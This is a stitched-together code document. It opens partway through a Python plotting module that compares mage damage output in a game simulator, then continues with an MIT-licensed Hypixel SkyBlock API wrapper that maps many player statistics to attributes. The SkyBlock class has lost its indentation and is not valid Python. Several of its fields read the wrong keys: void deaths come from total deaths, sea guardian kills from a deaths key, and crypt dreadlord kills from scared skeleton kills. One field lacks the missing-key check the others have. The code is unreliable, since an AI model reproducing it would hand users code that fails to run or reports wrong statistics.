                ax.plot(times, 100 * (dps / dps_0 - 1), linestyle=linestyles[i],
                        color=mage.color,
                        label=mage.label + ', ' + ui['buff_case_' + str(i) + '_label'])
    if label_0 is None:
        # Fix: with no checked buff case the original raised NameError on
        # label_0 below; there is nothing to compare, so stop here.
        return
    ax.set_xticks(ticks=np.arange((int((times[0] - 1) / 30) + 1) * 30, times[-1] + 1, 30))
    ax.set_xlabel('Total casting time before boss dead [s]')
    ax.set_ylabel('% damage increase vs ' + label_0)
    ax.legend()
    ax.set_xlim([ui['time_min'], ui['time_max']])
    ax.grid()
def set_default_mage(event):
    """Tk event handler: make the currently selected nav item the default mage.

    Walks up the widget tree to the frame that owns the ``nav`` widget,
    stores the first selected path as ``frame.default_mage``, or clears the
    attribute when nothing is selected, then deselects the nav items.

    :param event: Tk event whose ``widget`` sits somewhere below the frame.
    """
    frame = event.widget
    # Climb to the ancestor frame that owns the navigation widget.
    while not hasattr(frame, 'nav'):
        frame = frame.master
    frame.nav.clear_color('color3')
    frame.nav.color_selected('color3')
    mages = frame.nav.get_paths_of_selected_items()
    if len(mages) > 0:
        frame.default_mage = mages[0]  # reuse result instead of re-querying
        print('set default_mage:', frame.default_mage)
    else:
        # Fix: clearing when no default was ever set raised AttributeError.
        if hasattr(frame, 'default_mage'):
            delattr(frame, 'default_mage')
        print('cleared default_mage')
    frame.nav.deselect()
def plot_compare_mages(ui, default_mage, mages, buff_cases, linestyles, ax):
    """Plot every other mage's % dps gain relative to ``default_mage``.

    The default mage is drawn as the zero line in its own color; for each
    checked buff case, every other mage (identified by a differing
    ``location``) gets one curve of percentage dps difference.
    """
    xlim = [ui['time_min'], ui['time_max']]        # kept: reads ui keys (unused)
    times = np.arange(ui['time_min'], ui['time_max'] + 1, 1)
    max_ylim = ui['stat_weight_ymax']              # kept: reads ui keys (unused)
    ax.plot(times, np.zeros(times.shape), color=default_mage.color)
    for case_idx, buff_case in enumerate(buff_cases):
        style = linestyles[case_idx]
        if buff_case['check'] != 1:
            continue
        # Baseline dps of the reference mage for this buff case.
        baseline = get_dmg(default_mage, buff_case, times)[0] / times
        for other in mages:
            if other.location == default_mage.location:
                continue  # skip the reference mage itself
            dps = get_dmg(other, buff_case, times)[0] / times
            ax.plot(times, 100 * (dps / baseline - 1), linestyle=style,
                    color=other.color,
                    label=other.label + ', ' + ui['buff_case_' + str(case_idx) + '_label'])
    ax.set_xticks(ticks=np.arange((int((times[0] - 1) / 30) + 1) * 30, times[-1] + 1, 30))
    ax.grid()
    ax.set_xlabel('Total casting time before boss dead [s]')
    ax.set_ylabel('% damage increase vs ' + default_mage.label)
    ax.legend()
    ax.set_xlim([ui['time_min'], ui['time_max']])
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2021 plun1331
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import datetime
from .utils import SkyBlockUtils
# Dispatch table from slayer boss name to the SkyBlockUtils helper for that
# slayer — presumably converting slayer XP to a level; confirm against
# SkyBlockUtils.
# NOTE(review): the module-level name 'types' shadows the stdlib 'types'
# module within this file's namespace.
types = {'zombie': SkyBlockUtils.zombieSlayer,
'spider': SkyBlockUtils.spiderSlayer,
'wolf': SkyBlockUtils.wolfSlayer}
class SkyBlockStats(object):
r"""Represents a player's SkyBlock Statistics.
:param stats: The player's stats from their memberdata retrieved from the API.
:type stats: dict"""
def __init__(self, stats: dict):
self.top_crit_damage = stats['highest_crit_damage'] if 'highest_crit_damage' in stats else None
self.kills = int(stats['kills']) if 'kills' in stats else None
self.zombie_kills = int(stats['kills_zombie']) if 'kills_zombie' in stats else None
self.bids = int(stats['auctions_bids']) if 'auctions_bids' in stats else None
self.highest_bid = stats['auctions_highest_bid'] if 'auctions_highest_bid' in stats else None
self.zombie_villager_kills = int(stats['kills_zombie_villager']) if 'kills_zombie_villager' in stats else None
self.skeleton_kills = int(stats['kills_skeleton']) if 'kills_skeleton' in stats else None
self.spider_kills = int(stats['kills_spider']) if 'kills_spider' in stats else None
self.enderman_kills = int(stats['kills_enderman']) if 'kills_enderman' in stats else None
self.deaths = int(stats['deaths']) if 'deaths' in stats else None
self.zombie_deaths = int(stats['deaths_zombie']) if 'deaths_zombie' in stats else None
self.void_deaths = int(stats['deaths']) if 'deaths' in stats else None
self.skeleton_deaths = int(stats['deaths_skeleton']) if 'deaths_skeleton' in stats else None
self.fire_deaths = int(stats['deaths_fire']) if 'deaths_fire' in stats else None
self.auctions_won = int(stats['auctions_won']) if 'auctions_won' in stats else None
self.uncommon_auctions_bought = int(
stats['auctions_bought_uncommon']) if 'auctions_bought_uncommon' in stats else None
self.auctions_gold_spent = int(stats['auctions_gold_spent']) if 'auctions_gold_spent' in stats else None
self.auctions_created = int(stats['auctions_created']) if 'auctions_created' in stats else None
self.auction_fees_spent = int(stats['auctions_fees']) if 'auctions_fees' in stats else None
self.player_deaths = int(stats['deaths_player']) if 'deaths_player' in stats else None
self.auctions_completed = int(stats['auctions_completed']) if 'auctions_completed' in stats else None
self.uncommon_auctions_sold = int(
stats['auctions_sold_uncommon']) if 'auctions_sold_uncommon' in stats else None
self.auction_gold_earned = int(stats['auctions_gold_earned']) if 'auctions_gold_earned' in stats else None
self.invisible_creeper_kills = int(
stats['kills_invisible_creeper']) if 'kills_invisible_creeper' in stats else None
self.emerald_slime_kills = int(stats['kills_emerald_slime']) if 'kills_emerald_slime' in stats else None
self.diamond_zombie_kills = int(stats['kills_diamond_zombie']) if 'kills_diamond_zombie' in stats else None
self.diamond_skeleton_deaths = int(
stats['deaths_diamond_skeleton']) if 'deaths_diamond_skeleton' in stats else None
self.diamond_zombie_deaths = int(stats['deaths_diamond_zombie']) if 'deaths_diamond_zombie' in stats else None
self.diamond_skeleton_kills = int(
stats['kills_diamond_skeleton']) if 'kills_diamond_skeleton' in stats else None
self.lapis_zombie_kills = int(stats['kills_lapis_zombie']) if 'kills_lapis_zombie' in stats else None
self.emerald_slime_deaths = int(stats['deaths_emerald_slime']) if 'deaths_emerald_slime' in stats else None
self.redstone_pigman_kills = int(stats['kills_redstone_pigman']) if 'kills_redstone_pigman' in stats else None
self.redstone_pigman_deaths = int(
stats['deaths_redstone_pigman']) if 'deaths_redstone_pigman' in stats else None
self.splitter_spider_silverfish_kills = int(
stats['kills_splitter_spider_silverfish']) if 'kills_splitter_spider_silverfish' in stats else None
self.jockey_shot_silverfish_kills = int(
stats['kills_jockey_shot_silverfish']) if 'kills_jockey_shot_silverfish' in stats else None
self.wither_skeleton_kills = int(stats['kills_wither_skeleton']) if 'kills_wither_skeleton' in stats else None
self.magma_cube_kills = int(stats['kills_magma_cube']) if 'kills_magma_cube' in stats else None
self.magma_cube_fireball_kills = int(
stats['kills_fireball_magma_cube']) if 'kills_fireball_magma_cube' in stats else None
self.cow_kills = int(stats['kills_cow']) if 'kills_cow' in stats else None
self.pig_kills = int(stats['kills_pig']) if 'kills_pig' in stats else None
self.items_fished = int(stats['items_fished']) if 'items_fished' in stats else None
self.normal_items_fished = int(stats['items_fished_normal']) if 'items_fished_normal' in stats else None
self.treasure_items_fished = int(stats['items_fished_treasure']) if 'items_fished_treasure' in stats else None
self.common_auctions_bought = int(
stats['auctions_bought_common']) if 'auctions_bought_common' in stats else None
self.witch_kills = int(stats['kills_witch']) if 'kills_witch' in stats else None
self.spider_deaths = int(stats['deaths_spider']) if 'deaths_spider' in stats else None
self.epic_auctions_bought = int(stats['auctions_bought_epic']) if 'auctions_bought_epic' in stats else None
self.magma_cube_fireball_deaths = int(
stats['deaths_fireball_magma_cube']) if 'deaths_fireball_magma_cube' in stats else None
self.weaver_spider_kills = int(stats['kills_weaver_spider']) if 'kills_weaver_spider' in stats else None
self.splitter_spider_kills = int(stats['kills_splitter_spider']) if 'kills_splitter_spider' in stats else None
self.jockey_skeleton_kills = int(stats['kills_jockey_skeleton']) if 'kills_jockey_skeleton' in stats else None
self.spider_jockey_kills = int(stats['kills_spider_jockey']) if 'kills_spider_jockey' in stats else None
self.dasher_spider_kills = int(stats['kills_dasher_spider']) if 'kills_dasher_spider' in stats else None
self.spider_jockey_deaths = int(stats['deaths_spider_jockey']) if 'deaths_spider_jockey' in stats else None
self.dasher_spider_deaths = int(stats['deaths_dasher_spider']) if 'deaths_dasher_spider' in stats else None
self.jockey_shot_silverfish_deaths = int(
stats['deaths_jockey_shot_silverfish']) if 'deaths_jockey_shot_silverfish' in stats else None
self.splitter_spider_deaths = int(
stats['deaths_splitter_spider']) if 'deaths_splitter_spider' in stats else None
self.common_auctions_sold = int(stats['auctions_sold_common']) if 'auctions_sold_common' in stats else None
self.no_bid_auctions = int(stats['auctions_no_bids']) if 'auctions_no_bids' in stats else None
self.ghast_kills = int(stats['kills_ghast']) if 'kills_ghast' in stats else None
self.rare_auctions_sold = int(stats['auctions_sold_rare']) if 'auctions_sold_rare' in stats else None
self.epic_auctions_sold = int(stats['auctions_sold_epic']) if 'auctions_sold_epic' in stats else None
self.magma_cube_boss_deaths = int(
stats['deaths_magma_cube_boss']) if 'deaths_magma_cube_boss' in stats else None
self.blaze_kills = int(stats['kills_blaze']) if 'kills_blaze' in stats else None
self.wither_skeleton_deaths = int(
stats['deaths_wither_skeleton']) if 'deaths_wither_skeleton' in stats else None
self.magma_cube_deaths = int(stats['deaths_magma_cube']) if 'deaths_magma_cube' in stats else None
self.respawning_skeleton_kills = int(
stats['kills_respawning_skeleton']) if 'kills_respawning_skeleton' in stats else None
self.fall_deaths = int(stats['deaths_fall']) if 'deaths_fall' in stats else None
self.rare_auctions_bought = int(stats['auctions_bought_rare']) if 'auctions_bought_rare' in stats else None
self.rabbit_kills = int(stats['kills_rabbit']) if 'kills_rabbit' in stats else None
self.sheep_kills = int(stats['kills_sheep']) if 'kills_sheep' in stats else None
self.pigman_kills = int(stats['kills_pigman']) if 'kills_pigman' in stats else None
self.player_kills = int(stats['kills_player']) if 'kills_player' in stats else None
self.ruin_wolf_kills = int(stats['kills_ruin_wolf']) if 'kills_ruin_wolf' in stats else None
self.night_respawning_skeleton_kills = int(
stats['kills_night_respawining_skeleton']) if 'kills_night_respawining_skeleton' in stats else None
self.legendary_auctions_bought = int(
stats['auctions_bought_legendary']) if 'auctions_bought_legendary' in stats else None
self.chicken_kills = int(stats['kills_chicken']) if 'kills_chicken' in stats else None
self.respawning_skeleton_deaths = int(
stats['deaths_respawning_skeleton']) if 'deaths_respawning_skeleton' in stats else None
self.ruin_wolf_deaths = int(stats['deaths_ruin_wolf']) if 'deaths_ruin_wolf' in stats else None
self.unburried_zombie_deaths = int(
stats['deaths_unburied_zombie']) if 'deaths_unburied_zombie' in stats else None
self.unburried_zombie_kills = int(
stats['kills_unburried_zombie']) if 'kills_unburried_zombie' in stats else None
self.enderman_deaths = int(stats['deaths_enderman']) if 'deaths_enderman' in stats else None
self.endermite_deaths = int(stats['deaths_endermite']) if 'deaths_endermite' in stats else None
self.endermite_kills = int(stats['kills_endermite']) if 'kills_endermite' in stats else None
self.zealot_enderman_deaths = int(
stats['deaths_zealot_enderman']) if 'deaths_zealot_enderman' in stats else None
self.wise_dragon_deaths = int(stats['deaths_wise_dragon']) if 'deaths_wise_dragon' in stats else None
self.watcher_deaths = int(stats['deaths_watcher']) if 'deaths_watcher' in stats else None
self.watcher_kills = int(stats['kills_watcher']) if 'kills_watcher' in stats else None
self.random_slime_kills = int(stats['kills_random_slime']) if 'kills_random_slime' in stats else None
self.voracious_spider_kills = int(
stats['kills_voracious_spider']) if 'kills_voracious_spider' in stats else None
self.wolf_deaths = int(stats['deaths_wolf']) if 'deaths_wolf' in stats else None
self.old_wolf_kills = int(stats['kills_old_wolf']) if 'kills_old_wolf' in stats else None
self.olf_wolf_deaths = int(stats['deaths_old_wolf']) if 'deaths_old_wolf' in stats else None
self.zealot_enderman_kills = int(stats['kills_zealot_enderman']) if 'kills_zealot_enderman' in stats else None
self.obsidian_wither_kills = int(stats['kills_obsidian_wither']) if 'kills_obsidian_wither' in stats else None
self.howling_spirit_kills = int(stats['kills_howling_spirit']) if 'kills_howling_spirit' in stats else None
self.howling_spirit_deaths = int(stats['deaths_howling_spirit']) if 'deaths_howling_spirit' in stats else None
self.unknown_deaths = int(stats['deaths_unknown']) if 'deaths_unknown' in stats else None
self.sea_walker_kills = int(stats['kills_sea_walker']) if 'kills_sea_walker' in stats else None
self.pond_squid_kills = int(stats['kills_pond_squid']) if 'kills_pond_squid' in stats else None
self.sea_guardian_kills = int(stats['deaths_sea_guardian']) if 'deaths_sea_guardian' in stats else None
self.sea_archer_kills = int(stats['kills_sea_archer']) if 'kills_sea_archer' in stats else None
self.young_dragon_deaths = int(stats['deaths_young_dragon']) if 'deaths_young_dragon' in stats else None
self.zombie_deep_kills = int(stats['kills_zombie_deep']) if 'kills_zombie_deep' in stats else None
self.gifts_given = int(stats['gifts_given']) if 'gifts_given' in stats else None
self.gifts_recieved = int(stats['gifts_recieved']) if 'gifts_recieved' in stats else None
self.frozen_steve_deaths = int(stats['deaths_frozen_steve']) if 'deaths_frozen_steve' in stats else None
self.brood_mother_spider_kills = int(
stats['kills_brood_mother_spider']) if 'kills_brood_mother_spider' in stats else None
self.brood_mother_cave_spider_kills = int(
stats['kills_brood_mother_cave_spider']) if 'kills_brood_mother_cave_spider' in stats else None
self.foraging_race_best_time = int(
stats['foraging_race_best_time']) if 'foraging_race_best_time' in stats else None
self.legendary_auctions_sold = int(
stats['auctions_sold_legendary']) if 'auctions_sold_legendary' in stats else None
self.special_auctions_sold = int(stats['auctions_sold_special']) if 'auctions_sold_special' in stats else None
self.generator_magma_cube_kills = int(
stats['kills_generator_magma_cube']) if 'kills_generator_magma_cube' in stats else None
self.bat_pinata_kills = int(stats['kills_bat_pinata']) if 'kills_bat_pinata' in stats else None
self.special_auctions_bought = int(
stats['auctions_bought_special']) if 'auctions_bought_special' in stats else None
self.horseman_zombie_kills = int(stats['kills_horseman_zombie']) if 'kills_horseman_zombie' in stats else None
self.old_dragon_deaths = int(stats['deaths_old_dragon']) if 'deaths_old_dragon' in stats else None
self.liquid_hot_magma_deaths = int(
stats['deaths_liquid_hot_magma']) if 'deaths_liquid_hot_magma' in stats else None
self.liquid_hot_magma_kills = int(
stats['kills_liquid_hot_magma']) if 'kills_liquid_hot_magma' in stats else None
self.most_winter_snowballs_hit = int(
stats['most_winter_snowballs_hit']) if 'most_winter_snowballs_hit' in stats else None
self.most_winter_damage_dealt = int(
stats['most_winter_damage_dealt']) if 'most_winter_damage_dealt' in stats else None
self.most_winter_magma_damage_dealt = int(
stats['most_winter_magma_damage_dealt']) if 'most_winter_magma_damage_dealt' in stats else None
self.ender_crystals_destroyed = int(
stats['ender_crystals_destroyed']) if 'ender_crystals_destroyed' in stats else None
self.most_winter_cannonballs_hit = int(
stats['most_winter_cannonballs_hit']) if 'most_winter_cannonballs_hit' in stats else None
self.slime_kills = int(stats['kills_slime']) if 'kills_slime' in stats else None
self.unstable_dragon_deaths = int(
stats['deaths_unstable_dragon']) if 'deaths_unstable_dragon' in stats else None
self.superior_dragon_deaths = int(
stats['deaths_superior_dragon']) if 'deaths_superior_dragon' in stats else None
self.forest_island_bat_kills = int(
stats['kills_forest_island_bat']) if 'kills_forest_island_bat' in stats else None
self.strong_dragon_deaths = int(stats['deaths_strong_dragon']) if 'deaths_strong_dragon' in stats else None
self.pet_milestone_ores_mined = int(
stats['pet_milestone_ores_mined']) if 'pet_milestone_ores_mined' in stats else None
self.pet_milestone_sea_creatures_killed = int(
stats['pet_milestone_sea_creatures_killed']) if 'pet_milestone_sea_creatures_killed' in stats else None
self.chicken_deep_kills = int(stats['kills_chicken_deep']) if 'kills_chicken_deep' in stats else None
self.corrupted_protector_deaths = int(
stats['deaths_corrupted_protector']) if 'deaths_corrupted_protector' in stats else None
self.pack_spirit_kills = int(stats['kills_pack_spirit']) if 'kills_pack_spirit' in stats else None
self.soul_of_the_alpha_kills = int(
stats['kills_soul_of_the_alpha']) if 'kills_soul_of_the_alpha' in stats else None
self.frosty_the_snowman_kills = int(
stats['kills_frosty_the_snowman']) if 'kills_frosty_the_snowman' in stats else None
self.frozen_steve_kills = int(stats['kills_frozen_steve']) if 'kills_frozen_steve' in stats else None
self.catfish_kills = int(stats['kills_catfish']) if 'kills_catfish' in stats else None
self.dungeon_hub_crystal_core_anything_no_return_best_time = stats[
'dungeon_hub_crystal_core_anything_no_return_best_time'
] if 'dungeon_hub_crystal_core_anything_no_return_best_time' in stats else None
self.dungeon_hub_giant_mushroom_anything_no_return_best_time = stats[
'dungeon_hub_giant_mushroom_anything_no_return_best_time'
] if 'dungeon_hub_giant_mushroom_anything_no_return_best_time' in stats else None
self.dungeon_hub_giant_mushroom_no_pearls_no_return_best_time = stats[
'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time'
] if 'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time' in stats else None
self.dungeon_hub_precursor_ruins_anything_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_anything_no_return_best_time'
] if 'dungeon_hub_precursor_ruins_anything_no_return_best_time' in stats else None
self.dungeon_hub_precursor_ruins_nothing_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_nothing_no_return_best_time'
] if 'dungeon_hub_precursor_ruins_nothing_no_return_best_time' in stats else None
self.dungeon_hub_precursor_ruins_no_pearls_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time'
] if 'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time' in stats else None
self.crypt_lurker_kills = int(stats['kills_crypt_lurker']) if 'kills_crypt_lurker' in stats else None
self.dungeon_respawning_skeleton_kills = int(
stats['kills_dungeon_respawning_skeleton']) if 'kills_dungeon_respawning_skeleton' in stats else None
self.scared_skeleton_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None
self.skeleton_grunt_kills = int(stats['kills_skeleton_grunt']) if 'kills_skeleton_grunt' in stats else None
self.crypt_dreadlord_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None
self.crypt_souleater_kills = int(stats['kills_crypt_souleater']) if 'kills_crypt_souleater' in stats else None
self.crypt_tank_zombie_kills = int(
stats['kills_crypt_tank_zombie']) if 'kills_crypt_tank_zombie' in stats else None
self.diamond_guy_kills = int(stats['kills_diamond_guy']) if 'kills_diamond_guy' in stats else None
self.zombie_grunt_kills = int(stats['kills_zombie_grunt']) if 'kills_zombie_grunt' in stats else None
self.crypt_lurker_deaths = int(stats['deaths_crypt_lurker']) if 'deaths_crypt_lurker' in stats else None
self.lost_adventurer_deaths = int(
stats['deaths_lost_adventurer']) if 'deaths_lost_adventurer' in stats else None
self.watcher_summon_undead_kills = int(
stats['kills_watcher_summon_undead']) if 'kills_watcher_summon_undead' in stats else None
self.skeleton_soldier_kills = int(
stats['kills_skeleton_soldier']) if 'kills_skeleton_soldier' in stats else None
self.diamond_guy_deaths = int(stats['deaths_diamond_guy']) if 'deaths_diamond_guy' in stats else None
self.watcher_summon_undead_deaths = int(
stats['deaths_watcher_summon_undead']) if 'deaths_watcher_summon_undead' in stats else None
self.bonzo_summon_undead_kills = int(
stats['kills_bonzo_summon_undead']) if 'kills_bonzo_summon_undead' in stats else None
self.lost_adventurer_kills = int(stats['kills_lost_adventurer']) if 'kills_lost_adventurer' in stats else None
self.skeleton_master_kills = int(stats['kills_skeleton_master']) if 'kills_skeleton_master' in stats else None
self.sniper_skeleton_kills = int(stats['kills_sniper_skeleton']) if 'kills_sniper_skeleton' in stats else None
self.skeleton_soldier_deaths = int(
stats['deaths_skeleton_soldier']) if 'deaths_skeleton_soldier' in stats else None
self.trap_deaths = int(stats['deaths_trap']) if 'deaths_trap' in stats else None
self.crypt_undead_kills = int(stats['kills_crypt_undead']) if 'kills_crypt_undead' in stats else None
self.skeleton_grunt_deaths = int(stats['deaths_skeleton_grunt']) if 'deaths_skeleton_grunt' in stats else None
self.scarf_warrior_deaths = int(stats['deaths_scarf_warrior']) if 'deaths_scarf_warrior' in stats else None
self.skeleton_master_deaths = int(
stats['deaths_skeleton_master']) if 'deaths_skeleton_master' in stats else None
self.blaze_higher_or_lower_kills = int(
stats['kills_blaze_higher_or_lower']) if 'kills_blaze_higher_or_lower' in stats else None
self.dungeon_respawning_skeleton_deaths = int(
stats['deaths_dungeon_respawning_skeleton']) if 'deaths_dungeon_respawning_skeleton' in stats else None
self.scarf_deaths = int(stats['deaths_scarf']) if 'deaths_scarf' in stats else None
self.bonzo_summon_undead_deaths = int(
stats['deaths_bonzo_summon_undead']) if 'deaths_bonzo_summon_undead' in stats else None
self.bonzo_deaths = int(stats['deaths_bonzo']) if 'deaths_bonzo' in stats else None
self.lonely_spider_kills = int(stats['kills_lonely_spider']) if 'kills_lonely_spider' in stats else None
self.parasite_kills = int(stats['kills_parasite']) if 'kills_parasite' in stats else None
self.cellar_spider_kills = int(stats['kills_cellar_spiders']) if 'kills_cellar_spiders' in stats else None
self.dungeon_secret_bat_kills = int(
stats['kills_dungeon_secret_bat']) if 'kills_dungeon_secret_bat' in stats else None
self.scarf_mage_kills = int(stats['kills_scarf_mage']) if 'kills_scarf_mage' in stats else None
self.crypt_undead_friedrich_kills = int(
stats['kills_crypt_undead_friedrich']) if 'kills_crypt_undead_friedrich' in stats else None
self.guardian_defender_kills = int(
stats['kills_guardian_defender']) if 'kills_guardian_defender' in stats else None
self.crypt_dreadlord_deaths = int(
stats['deaths_crypt_dreadlord']) if 'deaths_crypt_dreadlord' in stats else None
self.zombie_soldier_kills = int(stats['kills_zombie_soldier']) if 'kills_zombie_soldier' in stats else None
self.skeletor_deaths = int(stats['deaths_skeletor']) if 'deaths_skeletor' in stats else None
self.skeletor_kills = int(stats['kills_skeletor']) if 'kills_skeletor' in stats else None
self.professer_mage_guardian_deaths = int(
stats['deaths_professor_mage_guardian']) if 'deaths_professor_mage_guardian' in stats else None
self.sea_leech_kills = int(stats['kills_sea_leech']) if 'kills_sea_leech' in stats else None
self.sea_witch_kills = int(stats['kills_sea_witch']) if 'kills_sea_witch' in stats else None
self.skeleton_emperor_kills = int(
stats['kills_skeleton_emperor']) if 'kills_skeleton_emperor' in stats else None
self.mythos_burrows_dug_next = int(
stats['mythos_burrows_dug_next']) if 'mythos_burrows_dug_next' in stats else None
self.common_mythos_burrows_dug_next = int(
stats['mythos_burrows_dug_next_COMMON']) if 'mythos_burrows_dug_next_COMMON' in stats else None
self.mythos_burrows_dug_combat = int(
stats['mythos_burrows_dug_combat']) if 'mythos_burrows_dug_combat' in stats else None
self.common_mythos_burrows_dug_combat = int(
stats['mythos_burrows_dug_combat_COMMON']) if 'mythos_burrows_dug_combat_COMMON' in stats else None
self.mythos_kills = int(stats['kills_mythos']) if 'kills_mythos' in stats else None
self.minos_hunter_kills = int(stats['kills_minos_hunter']) if 'kills_minos_hunter' in stats else None
self.mythos_burrows_dug_treasure = int(
stats['mythos_burrows_dug_treasure']) if 'mythos_burrows_dug_treasure' in stats else None
self.common_mythos_burrows_dug_treasure = int(
stats['mythos_burrows_dug_treasure_COMMON']) if 'mythos_burrows_dug_treasure_COMMON' in stats else None
self.siamese_lynx_kills = int(stats['kills_siamese_lynx']) if 'kills_siamese_lynx' in stats else None
self.mythos_burrows_chains_complete = int(
stats['mythos_burrows_chains_complete']) if 'mythos_burrows_chains_complete' in stats else None
self.common_mythos_burrows_chains_complete = int(stats['mythos_burrows_chains_complete_COMMON']
) if 'mythos_burrows_chains_complete_COMMON' in stats else None
self.rare_mythos_burrows_dug_next = int(
stats['mythos_burrows_dug_next_RARE']) if 'mythos_burrows_dug_next_RARE' in stats else None
self.rare_mythos_burrows_dug_combat = int(
stats['mythos_burrows_dug_combat_RARE']) if 'mythos_burrows_dug_combat_RARE' in stats else None
self.minotaur_deaths = int(stats['deaths_minotaur']) if 'deaths_minotaur' in stats else None
self.minotaur_kills = int(stats['kills_minotaur']) if 'kills_minotaur' in stats else None
self.gaia_construct_kills = int(stats['kills_gaia_construct']) if 'kills_gaia_construct' in stats else None
self.rare_mythos_burrows_dug_treasure = int(
stats['mythos_burrows_dug_treasure_RARE']) if 'mythos_burrows_dug_treasure_RARE' in stats else None
self.rare_mythos_burrows_chains_complete = int(
stats['mythos_burrows_chains_complete_RARE']) if 'mythos_burrows_chains_complete_RARE' in stats else None
self.gaia_construct_deaths = int(stats['deaths_gaia_construct']) if 'deaths_gaia_construct' in stats else None
self.siamese_lynx_deaths = int(stats['deaths_siamese_lynx']) if 'deaths_siamese_lynx' in stats else None
self.deep_sea_protector_kills = int(
stats['kills_deep_sea_protector']) if 'kills_deep_sea_protector' in stats else None
self.water_hydra_kills = int(stats['kills_water_hydra']) if 'kills_water_hydra' in stats else None
self.blue_shark_kills = int(stats['kills_blue_shark']) if 'kills_blue_shark' in stats else None
self.tiger_shark_kills = int(stats['kills_tiger_shark']) if 'kills_tiger_shark' in stats else None
self.nurse_shark_kills = int(stats['kills_nurse_shark']) if 'kills_nurse_shark' in stats else None
self.crypt_souleater_deaths = int(
stats['deaths_crypt_souleater']) if 'deaths_crypt_souleater' in stats else None
self.zombie_knight_kills = int(stats['kills_zombie_knight']) if 'kills_zombie_knight' in stats else None
self.crypt_undead_valentin_kills = int(
stats['kills_crypt_undead_valentin']) if 'kills_crypt_undead_valentin' in stats else None
self.soul_of_the_alpha_deaths = int(
stats['deaths_soul_of_the_alpha']) if 'deaths_soul_of_the_alpha' in stats else None
self.dungeon_hub_precursor_ruins_no_abilities_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_no_abilities_no_return_best_time']
self.crypt_wither_skeleton_kills = int(
stats['kills_crypt_witherskeleton']) if 'kills_crypt_witherskeleton' in stats else None
self.crypt_wither_skeleton_deaths = int(
stats['deaths_crypt_witherskeleton']) if 'deaths_crypt_witherskeleton' in stats else None
self.spirit_wolf_kills = int(stats['kills_spirit_wolf']) if 'kills_spirit_wolf' in stats else None
self.spirit_sheep_kills = int(stats['kills_spirit_sheep']) if 'kills_spirit_sheep' in stats else None
self.spirit_bull_kills = int(stats['kills_spirit_bull']) if 'kills_spirit_bull' in stats else None
self.spirit_rabbit_kills = int(stats['kills_spirit_rabbit']) if 'kills_spirit_rabbit' in stats else None
self.thork_kills = int(stats['kills_thorn']) if 'kills_thorn' in stats else None
self.livid_clone_deaths = int(stats['deaths_livid_clone']) if 'deaths_livid_clone' in stats else None
self.sniper_skeleton_deaths = int(
stats['deaths_sniper_skeleton']) if 'deaths_sniper_skeleton' in stats else None
self.super_tank_zombie_kills = int(
stats['kills_super_tank_zombie']) if 'kills_super_tank_zombie' in stats else None
self.super_archer_kills = int(stats['kills_super_archer']) if 'kills_super_archer' in stats else None
self.tentaclees_deaths = int(stats['deaths_tentaclees']) if 'deaths_tentaclees' in stats else None
self.corrupted_protector_kills = int(
stats['kills_corrupted_protector']) if 'kills_corrupted_protector' in stats else None
self.professer_guardian_summon_kills = int(
stats['kills_professor_guardian_summon']) if 'kills_professor_guardian_summon' in stats else None
self.unstable_dragon_kills = int(stats['kills_unstable_dragon']) if 'kills_unstable_dragon' in stats else None
self.strong_dragon_kills = int(stats['kills_strong_dragon']) if 'kills_strong_dragon' in stats else None
self.spirit_bat_kills = int(stats['kills_spirit_bat']) if 'kills_spirit_bat' in stats else None
self.shadow_assassin_kills = int(stats['kills_shadow_assassin']) if 'kills_shadow_assassin' in stats else None
self.tentaclees_kills = int(stats['kills_tentaclees']) if 'kills_tentaclees' in stats else None
self.livid_deaths = int(stats['deaths_livid']) if 'deaths_livid' in stats else None
self.sadan_statue_deaths = int(stats['deaths_sadan_statue']) if 'deaths_sadan_statue' in stats else None
self.scary_jerry_kills = int(stats['kills_scary_jerry']) if 'kills_scary_jerry' in stats else None
self.wither_gourd_kills = int(stats['kills_wither_gourd']) if 'kills_wither_gourd' in stats else None
self.trick_or_treater_kills = int(
stats['kills_trick_or_treater']) if 'kills_trick_or_treater' in stats else None
self.phantom_spirit_kills = int(stats['kills_phantom_spirit']) if 'kills_phantom_spirit' in stats else None
self.wraith_kills = int(stats['kills_wraith']) if 'kills_wraith' in stats else None
self.batty_witch_kills = int(stats['kills_batty_witch']) if 'kills_batty_witch' in stats else None
self.zombie_commander_kills = int(
stats['kills_zombie_commander']) if 'kills_zombie_commander' in stats else None
self.watcher_guardian_deaths = int(
stats['deaths_watcher_guardian']) if 'deaths_watcher_guardian' in stats else None
self.skeletor_prime_kills = int(stats['kills_skeletor_prime']) if 'kills_skeletor_prime' in stats else None
self.super_tank_zombie_deaths = int(
stats['deaths_super_tank_zombie']) if 'deaths_super_tank_zombie' in stats else None
self.skeletor_prime_deaths = int(stats['deaths_skeletor_prime']) if 'deaths_skeletor_prime' in stats else None
self.great_white_shark_kills = int(
stats['kills_great_white_shark']) if 'kills_great_white_shark' in stats else None
self.zombie_knight_deaths = int(stats['deaths_zombie_knight']) if 'deaths_zombie_knight' in stats else None
